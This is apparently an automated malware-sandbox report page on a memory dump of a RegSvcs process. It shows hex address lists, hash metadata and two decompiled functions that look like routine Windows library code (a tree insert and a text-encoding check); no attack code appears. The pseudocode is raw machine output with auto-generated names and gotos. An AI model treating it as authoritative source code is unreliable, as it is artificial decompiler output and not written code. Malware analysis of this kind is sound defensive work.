                                          0x01365827
                                          0x00000000
                                          0x00000000
                                          0x0136582d
                                          0x00000000
                                          0x0136582d
                                          0x00000000
                                          0x01322228
                                          0x01322228
                                          0x00000000
                                          0x01322228
                                          0x01322222
                                          0x01322214
                                          0x01322214
                                          0x00000000
                                          0x01322114
                                          0x01322114
                                          0x01322114
                                          0x0132211a
                                          0x0132211c
                                          0x01322348
                                          0x0132234d
                                          0x01365840
                                          0x01365845
                                          0x01365848
                                          0x0136584e
                                          0x0136584e
                                          0x01365848
                                          0x01322353
                                          0x01322355
                                          0x01322388
                                          0x01322388
                                          0x01322368
                                          0x0132236a
                                          0x0132236c
                                          0x0132238f
                                          0x00000000
                                          0x0132236e
                                          0x0132236e
                                          0x0132218e
                                          0x0132218e
                                          0x01322191
                                          0x01322195
                                          0x01365a03
                                          0x01365a06
                                          0x01365a0c
                                          0x01365a0f
                                          0x01365a11
                                          0x01365a13
                                          0x01365a13
                                          0x01365a19
                                          0x01365a1f
                                          0x00000000
                                          0x0132219b
                                          0x0132219b
                                          0x013221a0
                                          0x01322282
                                          0x01322284
                                          0x01322284
                                          0x01322284
                                          0x01322284
                                          0x013221a6
                                          0x013221a9
                                          0x013221ac
                                          0x013221ae
                                          0x013221b3
                                          0x0132228b
                                          0x01322290
                                          0x01322379
                                          0x01322296
                                          0x01322298
                                          0x01322298
                                          0x01322290
                                          0x013221b9
                                          0x013221be
                                          0x013222a2
                                          0x013222a2
                                          0x013221c4
                                          0x013221c8
                                          0x013221cc
                                          0x013221d0
                                          0x013221d4
                                          0x013221de
                                          0x013221e3
                                          0x01365a29
                                          0x01365a2c
                                          0x00000000
                                          0x00000000
                                          0x01365a3b
                                          0x00000000
                                          0x013221e9
                                          0x013221e9
                                          0x013221e9
                                          0x013221ee
                                          0x013221f1
                                          0x01365a45
                                          0x01365a4b
                                          0x01365a52
                                          0x01365a58
                                          0x01365a5d
                                          0x01365a5f
                                          0x01365a71
                                          0x01365a61
                                          0x01365a6a
                                          0x01365a6a
                                          0x01365a76
                                          0x01365a79
                                          0x01365a7f
                                          0x01365a83
                                          0x01365a85
                                          0x01365a87
                                          0x01365a87
                                          0x01365a8c
                                          0x01365a91
                                          0x01365a97
                                          0x01365a9f
                                          0x01365aa0
                                          0x01365aa1
                                          0x01365aa6
                                          0x01365aab
                                          0x01365ab1
                                          0x01365ab3
                                          0x01365ab9
                                          0x01365aca
                                          0x01365ad4
                                          0x01365ad4
                                          0x01365ade
                                          0x01365ade
                                          0x01365aab
                                          0x01365a79
                                          0x01365a52
                                          0x013221f7
                                          0x013221f9
                                          0x013221fe
                                          0x013221fe
                                          0x013221e3
                                          0x01322195
                                          0x0132236c
                                          0x01322122
                                          0x01322122
                                          0x01322124
                                          0x01322231
                                          0x01322236
                                          0x01322236
                                          0x01322238
                                          0x01322238
                                          0x01322240
                                          0x01322242
                                          0x01322244
                                          0x013659fc
                                          0x0132218c
                                          0x0132218c
                                          0x00000000
                                          0x0132218c
                                          0x0132224a
                                          0x0132224f
                                          0x01322256
                                          0x01322304
                                          0x01322309
                                          0x0132230f
                                          0x0132231e
                                          0x0132231e
                                          0x0132231e
                                          0x01322320
                                          0x01322325
                                          0x0132232a
                                          0x0132232c
                                          0x0132233e
                                          0x0132233e
                                          0x00000000
                                          0x0132232c
                                          0x01322311
                                          0x01322317
                                          0x0132231a
                                          0x0132231c
                                          0x01322380
                                          0x01322380
                                          0x01322380
                                          0x01322384
                                          0x00000000
                                          0x00000000
                                          0x01322386
                                          0x00000000
                                          0x0132231c
                                          0x0132225c
                                          0x0132225c
                                          0x00000000
                                          0x0132225c
                                          0x0132212a
                                          0x01322134
                                          0x01322138
                                          0x0132213d
                                          0x01365858
                                          0x01365863
                                          0x01365863
                                          0x01365867
                                          0x0136586a
                                          0x00000000
                                          0x00000000
                                          0x0136586c
                                          0x0136586c
                                          0x01365871
                                          0x01365875
                                          0x01365877
                                          0x01365997
                                          0x0136599c
                                          0x013659a1
                                          0x013659a7
                                          0x013659a7
                                          0x00000000
                                          0x013659a7
                                          0x0136587d
                                          0x00000000
                                          0x0136588b
                                          0x0136588b
                                          0x01365890
                                          0x01365892
                                          0x01365894
                                          0x01365899
                                          0x0136589b
                                          0x013658a0
                                          0x013658a0
                                          0x013658aa
                                          0x013658b2
                                          0x013658b6
                                          0x013658be
                                          0x013658c6
                                          0x013658c9
                                          0x0136590d
                                          0x01365917
                                          0x0136591a
                                          0x0136591c
                                          0x01365920
                                          0x01365928
                                          0x0136592a
                                          0x0136592c
                                          0x0136592e
                                          0x0136592e
                                          0x013658cb
                                          0x013658cd
                                          0x013658d8
                                          0x013658e0
                                          0x013658f4
                                          0x013658fe
                                          0x013658fe
                                          0x0136593a
                                          0x0136593e
                                          0x01365940
                                          0x01365942
                                          0x00000000
                                          0x01365944
                                          0x01365944
                                          0x01365949
                                          0x0136594e
                                          0x0136594e
                                          0x01365953
                                          0x0136595b
                                          0x01365976
                                          0x01365976
                                          0x0136597a
                                          0x0136597f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01365981
                                          0x01365981
                                          0x01365981
                                          0x01365983
                                          0x01365988
                                          0x0136598d
                                          0x01365991
                                          0x01365991
                                          0x00000000
                                          0x0136595d
                                          0x0136595d
                                          0x01365963
                                          0x01365965
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01365967
                                          0x01365967
                                          0x0136596b
                                          0x0136596d
                                          0x00000000
                                          0x00000000
                                          0x0136596f
                                          0x01365971
                                          0x01365971
                                          0x01365974
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01365974
                                          0x00000000
                                          0x01365967
                                          0x0136595b
                                          0x01365942
                                          0x01365863
                                          0x01322143
                                          0x01322143
                                          0x01322149
                                          0x0132214f
                                          0x013222f1
                                          0x013222f6
                                          0x00000000
                                          0x01322173
                                          0x01322173
                                          0x0132217d
                                          0x01322181
                                          0x01322186
                                          0x013659ae
                                          0x013659b2
                                          0x013659b5
                                          0x013659b7
                                          0x013659ba
                                          0x013659cd
                                          0x013659d1
                                          0x013659d5
                                          0x013659d9
                                          0x013659db
                                          0x00000000
                                          0x00000000
                                          0x013659dd
                                          0x013659dd
                                          0x013659e1
                                          0x013659e4
                                          0x013659e7
                                          0x013659ee
                                          0x013659ee
                                          0x013659f3
                                          0x013659f3
                                          0x00000000
                                          0x01322186
                                          0x0132214f
                                          0x01322106
                                          0x01322266
                                          0x013220d8
                                          0x013220da
                                          0x013220e0
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a46de269b9836959c89c1756d78493e5cc0ff50cbecb8d5c81b702327845016c
                                          • Instruction ID: e04d409ef860998f0f3c84acb9452061b173cffd701d87f3a410b0b4a6d0300e
                                          • Opcode Fuzzy Hash: a46de269b9836959c89c1756d78493e5cc0ff50cbecb8d5c81b702327845016c
                                          • Instruction Fuzzy Hash: 6DF12531A083119FE736DF2CC840B6B7BE9AF8636CF14852DE9959B285D775D840CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0130B090 Relevance: .4, Instructions: 405COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E0130B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                          0x0130b095
                                          0x0130b09b
                                          0x0130b09f
                                          0x0130b0a5
                                          0x0130b0a7
                                          0x0130b0aa
                                          0x0130b0ad
                                          0x0130b0b1
                                          0x0130b3f8
                                          0x0130b3fa
                                          0x0130b3ff
                                          0x0130b419
                                          0x0130b41b
                                          0x0130b41b
                                          0x0130b401
                                          0x00000000
                                          0x0130b0b7
                                          0x0130b0b9
                                          0x0130b0bc
                                          0x0130b0c0
                                          0x0130b0c2
                                          0x0130b0c2
                                          0x0130b0c4
                                          0x0130b0c8
                                          0x0130b0cf
                                          0x0130b0d1
                                          0x0130b0d1
                                          0x0130b0da
                                          0x0130b0dd
                                          0x0130b0df
                                          0x0130b0df
                                          0x0130b0e4
                                          0x0130b0e9
                                          0x0130b3e2
                                          0x0130b3e5
                                          0x0130b3eb
                                          0x0135a676
                                          0x0135a67b
                                          0x0135a67d
                                          0x0130b3f1
                                          0x0130b3f1
                                          0x0130b3f1
                                          0x0130b0ef
                                          0x0130b0ef
                                          0x0130b0ef
                                          0x0130b0e9
                                          0x0130b0f6
                                          0x0130b28d
                                          0x0130b28e
                                          0x0130b293
                                          0x0130b0fc
                                          0x0130b0fc
                                          0x0130b101
                                          0x0130b104
                                          0x0130b107
                                          0x0130b10c
                                          0x0135a687
                                          0x0135a68d
                                          0x0135a68d
                                          0x0135a687
                                          0x0130b112
                                          0x0130b116
                                          0x0135a696
                                          0x0135a69c
                                          0x0135a69c
                                          0x0135a696
                                          0x0130b120
                                          0x0130b121
                                          0x0130b124
                                          0x0130b127
                                          0x0130b12a
                                          0x0130b12d
                                          0x0130b132
                                          0x0135a6a5
                                          0x00000000
                                          0x00000000
                                          0x0135a6ab
                                          0x00000000
                                          0x0130b138
                                          0x0130b138
                                          0x0130b13a
                                          0x0130b193
                                          0x0130b197
                                          0x0130b19d
                                          0x0130b29c
                                          0x0130b29f
                                          0x0130b2a2
                                          0x0130b2a7
                                          0x0135a6d2
                                          0x0135a6d8
                                          0x0135a6d8
                                          0x0135a6d2
                                          0x0130b2af
                                          0x0130b420
                                          0x0130b422
                                          0x0130b423
                                          0x00000000
                                          0x0130b2b5
                                          0x0130b2b5
                                          0x0130b2ba
                                          0x0135a6e1
                                          0x0135a6e7
                                          0x0135a6e7
                                          0x0135a6e1
                                          0x0130b2c2
                                          0x00000000
                                          0x0130b2c8
                                          0x0130b2cb
                                          0x0130b2d0
                                          0x0135a6f0
                                          0x0135a6f6
                                          0x0135a6f6
                                          0x0135a6f0
                                          0x0130b2d8
                                          0x00000000
                                          0x0130b2de
                                          0x0130b2de
                                          0x0130b2de
                                          0x0130b2e1
                                          0x0130b2e6
                                          0x0130b2eb
                                          0x0135a6ff
                                          0x0135a705
                                          0x0135a705
                                          0x0135a6ff
                                          0x0130b2f3
                                          0x00000000
                                          0x0130b2f9
                                          0x0130b2fb
                                          0x0130b2fd
                                          0x0130b301
                                          0x0130b303
                                          0x0130b303
                                          0x0130b308
                                          0x0130b30b
                                          0x0130b310
                                          0x0130b312
                                          0x0130b312
                                          0x0130b31c
                                          0x0130b322
                                          0x0130b327
                                          0x0135a70e
                                          0x0130b335
                                          0x0130b337
                                          0x0135a71d
                                          0x0135a723
                                          0x0135a723
                                          0x0135a71d
                                          0x0130b340
                                          0x0130b345
                                          0x0130b349
                                          0x0135a72a
                                          0x0135a72a
                                          0x0130b352
                                          0x0130b357
                                          0x0130b359
                                          0x0130b359
                                          0x0130b365
                                          0x0130b367
                                          0x0130b36c
                                          0x00000000
                                          0x0130b36c
                                          0x0135a714
                                          0x0135a714
                                          0x0130b32f
                                          0x0130b3b8
                                          0x0130b3bd
                                          0x0130b3c4
                                          0x0130b425
                                          0x0130b427
                                          0x0130b429
                                          0x0130b429
                                          0x0130b427
                                          0x0130b3c8
                                          0x00000000
                                          0x00000000
                                          0x0130b3ce
                                          0x0130b42f
                                          0x0130b3d0
                                          0x0130b3d0
                                          0x0130b3d0
                                          0x0130b3d7
                                          0x0130b3da
                                          0x0130b3da
                                          0x00000000
                                          0x0130b32f
                                          0x0130b2f3
                                          0x0130b2d8
                                          0x0130b2c2
                                          0x0130b2af
                                          0x0130b1a3
                                          0x0130b1a9
                                          0x0130b1af
                                          0x0130b1b2
                                          0x0130b1b5
                                          0x0130b1b8
                                          0x0135a733
                                          0x0135a739
                                          0x0135a739
                                          0x0135a733
                                          0x0130b1c0
                                          0x00000000
                                          0x0130b1c6
                                          0x0130b1c8
                                          0x0130b1cb
                                          0x0130b1ce
                                          0x0130b1d3
                                          0x0135a742
                                          0x0135a748
                                          0x0135a748
                                          0x0135a742
                                          0x0130b1db
                                          0x00000000
                                          0x0130b1e1
                                          0x0130b1e1
                                          0x0130b1e6
                                          0x0130b1e9
                                          0x0130b1ee
                                          0x0135a751
                                          0x0130b409
                                          0x0130b409
                                          0x0130b40e
                                          0x00000000
                                          0x00000000
                                          0x0130b410
                                          0x0130b22d
                                          0x0130b22f
                                          0x0135a790
                                          0x0135a796
                                          0x0135a796
                                          0x0135a790
                                          0x0130b23d
                                          0x0130b243
                                          0x0130b248
                                          0x0135a79f
                                          0x00000000
                                          0x00000000
                                          0x0135a7a5
                                          0x00000000
                                          0x0130b24e
                                          0x0130b24e
                                          0x0130b250
                                          0x0130b374
                                          0x0130b379
                                          0x0130b37e
                                          0x0135a7ae
                                          0x0135a7b4
                                          0x0135a7b4
                                          0x0135a7ae
                                          0x0130b386
                                          0x00000000
                                          0x0130b38c
                                          0x0130b38e
                                          0x0135a7bd
                                          0x0130b394
                                          0x0130b394
                                          0x0130b394
                                          0x0130b39b
                                          0x0130b39e
                                          0x00000000
                                          0x0130b39e
                                          0x0130b386
                                          0x0130b256
                                          0x0130b258
                                          0x0135a7c6
                                          0x0135a7cc
                                          0x0135a7cc
                                          0x0135a7c6
                                          0x0130b261
                                          0x0130b266
                                          0x0130b26a
                                          0x0135a7d3
                                          0x0135a7d3
                                          0x0130b273
                                          0x0130b278
                                          0x0130b27a
                                          0x0130b27a
                                          0x0130b281
                                          0x0130b283
                                          0x0130b285
                                          0x0130b287
                                          0x0130b289
                                          0x00000000
                                          0x0130b289
                                          0x0130b248
                                          0x0135a757
                                          0x0135a757
                                          0x0130b1f6
                                          0x00000000
                                          0x00000000
                                          0x0130b1fc
                                          0x0130b201
                                          0x0135a760
                                          0x0135a766
                                          0x0135a766
                                          0x0135a760
                                          0x0130b209
                                          0x0130b3a8
                                          0x0135a76f
                                          0x0130b3ae
                                          0x0130b3ae
                                          0x0130b3ae
                                          0x0130b3b0
                                          0x00000000
                                          0x0130b20f
                                          0x0130b20f
                                          0x0130b213
                                          0x0135a778
                                          0x0135a77e
                                          0x0135a77e
                                          0x0135a778
                                          0x0130b21b
                                          0x00000000
                                          0x0130b221
                                          0x0130b223
                                          0x0135a787
                                          0x0130b229
                                          0x0130b229
                                          0x0130b229
                                          0x0130b22b
                                          0x00000000
                                          0x0130b22b
                                          0x0130b21b
                                          0x0130b209
                                          0x0130b1db
                                          0x0130b142
                                          0x0130b142
                                          0x0130b146
                                          0x0130b148
                                          0x0130b14c
                                          0x0130b14f
                                          0x0130b154
                                          0x0130b15b
                                          0x0135a6b4
                                          0x00000000
                                          0x00000000
                                          0x0135a6ba
                                          0x0135a6ba
                                          0x0130b163
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130b163
                                          0x0130b13a
                                          0x0130b169
                                          0x0130b16b
                                          0x0130b16e
                                          0x0130b171
                                          0x0130b175
                                          0x0130b178
                                          0x0135a6c3
                                          0x0135a6c9
                                          0x0135a6c9
                                          0x0135a6c3
                                          0x0130b180
                                          0x0130b184
                                          0x00000000
                                          0x0130b104
                                          0x0130b0f6

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                          • Instruction ID: 37dfe97319a5bf62793c058e7fcdfd59e6ed83b805e7892ebe7a66401d23af8e
                                          • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                          • Instruction Fuzzy Hash: C8D12A39700306CBDB27CE6CC4A076AFBE9AF8465CB298168DC55CB3CAE731D8419750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F0D20 Relevance: .4, Instructions: 372COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E012F0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
